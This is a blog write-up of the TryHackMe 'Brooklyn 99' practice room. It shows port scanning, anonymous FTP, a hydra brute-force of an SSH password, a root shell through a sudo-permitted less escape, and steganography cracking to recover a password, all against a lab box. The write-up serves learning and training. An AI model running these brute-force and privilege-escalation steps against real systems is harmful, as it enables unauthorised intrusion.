Skip to content
All posts
Security

TryHackMe: Brooklyn 99

March 21, 2021·Read on Medium·

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Brooklyn 99 challenge.

Room: https://tryhackme.com/room/brooklynninenine
Level: Easy

Task: This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.

Lets get started

The task says there is 2 method to access the root. Lets go all the way if can find it

As usual, open the IP in browser first.

There is a hint “Have you ever heard of steganography?”. Might be something from the wallpaper. Because Im too lazy, using online decoder, unfortunately, nothing!

But it’s okay, let’s run both gobuster and nmap.

# gobuster dir -u 10.10.61.X -w wordlists/dirb/common.txt -t 20

No luck from gobuster. Tried different directory dict also no luck.

# nmap -T4 -A -sS -sS -p- 10.10.61.61
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.163.74
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Thats interesting. It says that FTP is allow anonymous login. Using Cyberduck,

There is only 1 file there says,

From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

There is no admin page or whatsoever, then SSH all the way using “jake” as username and brute the password

# hydra -l jake -P wordlists/rockyou.txt 10.10.162.161 ssh
...
[DATA] attacking ssh://10.10.162.161:22/
[22][ssh] host: 10.10.162.161   login: jake   password: XXXXXXXXX
...

Ok that was easy.

# ssh jake@10.10.162.161
The authenticity of host '10.10.162.161 (10.10.162.161)' can't be established.
ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.162.161' (ECDSA) to the list of known hosts.
jake@10.10.162.161's password:
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$

Lets go through,

# ls /home
amy  holt  jake
# ls -al holt
-rw------- 1 root root  110 May 18  2020 nano.save
-rw-rw-r-- 1 holt holt   33 May 17  2020 user.txt
# cat /home/holt/user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXX

Ok now, user flag is captured. Now, we need to find the root hole.

# sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
     (ALL) NOPASSWD: /usr/bin/less

Oh! less command doesn’t need password. Let’s refer GTFObins then. Run this,

sudo less /etc/profile
!/bin/sh

Now root shell is available!

# ls -al /root
...
...
-rw-r--r--  1 root root  135 May 18  2020 root.txt
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796bXXXXXXXXXXXXX
Enjoy!!

Found the root flag!!.

BUT, if the CTF stated that there is another way to access the server. Let’s check first, SSH done✅ , FTP done✅, Directory brute ✅. What else missing? There is only 1 hint from the source code is “steganography”. But failed to decode earlier right? Password then? Where is the password?

Crack the password using stegcracker from github

# stegcracker ~/Downloads/brooklyn99.jpg ~/wordlists/rockyou.txt
Successfully cracked file with password: XXXXX                                                                                                                                                     Tried 20650 passwords                                                                                                                                                                              Your file has been written to: /home/kapalbiru/Downloads/brooklyn99.jpg.out

Alright.. got the password

# steghide extract -sf ~/Downloads/brooklyn99.jpg                                                          Enter passphrase:                                                                                                                                                                                                                                        wrote extracted data to "note.txt".
# cat note.txt
Holts Password:                                                                                                                                                                                    XXXXXXXXXXXXXXXXXXXXXXXXX
Enjoy!!

So now make sense. That’s why user flag is located in holts folder.

Found this helpful?

If this article saved you time or solved a problem, consider supporting — it helps keep the writing going.

☕ Buy me a coffeePayPal

Originally published on Medium.

View on Medium
TryHackMe: Brooklyn 99 — Hafiq Iqmal — Hafiq Iqmal